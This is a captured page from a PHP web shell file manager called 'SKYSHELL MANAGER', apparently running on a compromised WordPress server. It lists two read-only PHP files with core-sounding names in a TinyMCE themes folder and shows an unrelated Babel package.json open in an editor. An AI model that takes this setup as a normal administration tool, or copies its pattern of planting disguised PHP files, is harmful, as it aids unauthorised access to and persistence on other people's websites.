📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "name": "@babel/helper-plugin-test-runner", "version": "7.18.6", "description": "Helper function to support test runner", "repository": { "type": "git", "url": "https://github.com/babel/babel.git", "directory": "packages/babel-helper-plugin-test-runner" }, "homepage": "https://babel.dev/docs/en/next/babel-helper-plugin-test-runner", "license": "MIT", "publishConfig": { "access": "public" }, "main": "./lib/index.js", "exports": { ".": [ { "import": "./esm.mjs", "default": "./lib/index.js" }, "./lib/index.js" ], "./lib": "./lib/index.js", "./lib/index": "./lib/index.js", "./lib/index.js": "./lib/index.js", "./package": "./package.json", "./package.json": "./package.json" }, "dependencies": { "@babel/helper-transform-fixture-test-runner": "workspace:^" }, "engines": { "node": ">=6.9.0" }, "author": "The Babel Team (https://babel.dev/team)", "conditions": { "BABEL_8_BREAKING": [ { "exports": { ".": { "import": "./esm.mjs", "default": "./lib/index.js" }, "./package.json": "./package.json" } }, { "exports": null } ] }, "type": "commonjs" }
Save